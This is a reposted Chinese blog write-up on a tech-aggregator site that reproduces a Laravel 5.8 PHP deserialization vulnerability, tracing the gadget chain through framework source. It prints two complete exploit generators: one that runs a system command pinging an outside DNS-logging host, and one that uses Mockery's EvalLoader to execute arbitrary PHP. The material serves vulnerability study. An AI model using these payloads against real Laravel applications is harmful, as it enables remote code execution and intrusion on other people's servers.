IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> Laravel5.8反序列化复现分析 -> 正文阅读

[PHP知识库]Laravel5.8反序列化复现分析

搭建环境

使用composer下载项目环境
composer create-project --prefer-dist laravel/laravel=5.8.* ./
详细的搭建参考上篇文章

漏洞分析

这次漏洞的起点位于
vendor\laravel\framework\src\Illuminate\Broadcasting\PendingBroadcast.php的析构函数

public function __destruct()
    {
        $this->events->dispatch($this->event);
    }

全局搜索一个我们可以利用的dispatch()方法
在这里插入图片描述
跟进查看commandShouldBeQueued()

protected function commandShouldBeQueued($command)
    {
        return $command instanceof ShouldQueue;
    }

$command 需要实现这个接口全局查找一个合适的类
在这里插入图片描述

跟进dispatchToQueue($command)

 public function dispatchToQueue($command)
    {
        $connection = $command->connection ?? null;

        $queue = call_user_func($this->queueResolver, $connection);

        if (! $queue instanceof Queue) {
            throw new RuntimeException('Queue resolver did not return a Queue implementation.');
        }

        if (method_exists($command, 'queue')) {
            return $command->queue($queue, $command);
        }

        return $this->pushCommandToQueue($queue, $command);
    }

$this->queueResolver作为要调用的命令, $connection作为参数
构造exp:

<?php
namespace Illuminate\Broadcasting{
    class PendingBroadcast{
        protected $event;
        protected $events;
        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        }
    }
    class BroadcastEvent{
        public $connection;
        public function __construct($connection)
        {
            $this->connection = $connection;
        }
    }
}
namespace Illuminate\Bus{
    class Dispatcher{
        protected $queueResolver;
        public function __construct($queueResolver)
        {   
           $this->queueResolver = $queueResolver;
        }
    }
}

namespace {
    $c = new Illuminate\Broadcasting\BroadcastEvent('ping aiuuvg.dnslog.cn');
    $b = new Illuminate\Bus\Dispatcher('system');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);
    print(urlencode(serialize($a)));
}
?>

因为命令执行后的判断报错,导致结果出不来,但是可以执行一些命令的,比如ping,接下来找找看看能不能让他代码执行,全局搜索eval
在这里插入图片描述
绕过第一个判断不能让他return,跟进getClassName()

public function getClassName()
    {
        return $this->config->getName();
    }

getName()在MockConfiguration.php,name随便设即可
在这里插入图片描述
接着跟进getCode

eval("?>" . $definition->getCode());

这里返回一个code,将它设为我们想执行的代码即可

public function getCode()
    {
        return $this->code;
    }

构造exp:

namespace Illuminate\Broadcasting{

    use Mockery\Generator\MockConfiguration;
    use Mockery\Generator\MockDefinition;
    class PendingBroadcast{
        protected $event;
        protected $events;
        public function __construct($events, $event)
        {
            $this->event = $event;
            $this->events = $events;
        } 
    }
    class BroadcastEvent{
        public $connection;
        public function __construct()
        {
            $this->connection = new MockDefinition(new MockConfiguration());
        }
    }
}
namespace Illuminate\Bus{
    class Dispatcher{
        protected $queueResolver;
        public function __construct($queueResolver)
        {   
           $this->queueResolver = $queueResolver;
        }
    }
}
namespace Mockery\Loader{
    class EvalLoader{

    }
}
namespace Mockery\Generator{
    class MockDefinition{
        protected $config;
        protected $code;
        public function __construct($config)
        {
            $this->config = $config;
            $this->code = '<?php phpinfo();exit();?>';
        }
    }
    class MockConfiguration
    {
        protected $name="kb";
    }
}

namespace {

    $c = new Illuminate\Broadcasting\BroadcastEvent();
    $b = new Illuminate\Bus\Dispatcher([new Mockery\Loader\EvalLoader,'load']);
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, $c);
    print(urlencode(serialize($a)));
}

在这里插入图片描述
参考链接:合天网安-通过几道CTF题学习Laravel框架

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-01-11 23:46:49  更:2022-01-11 23:47:08 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:36:22-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码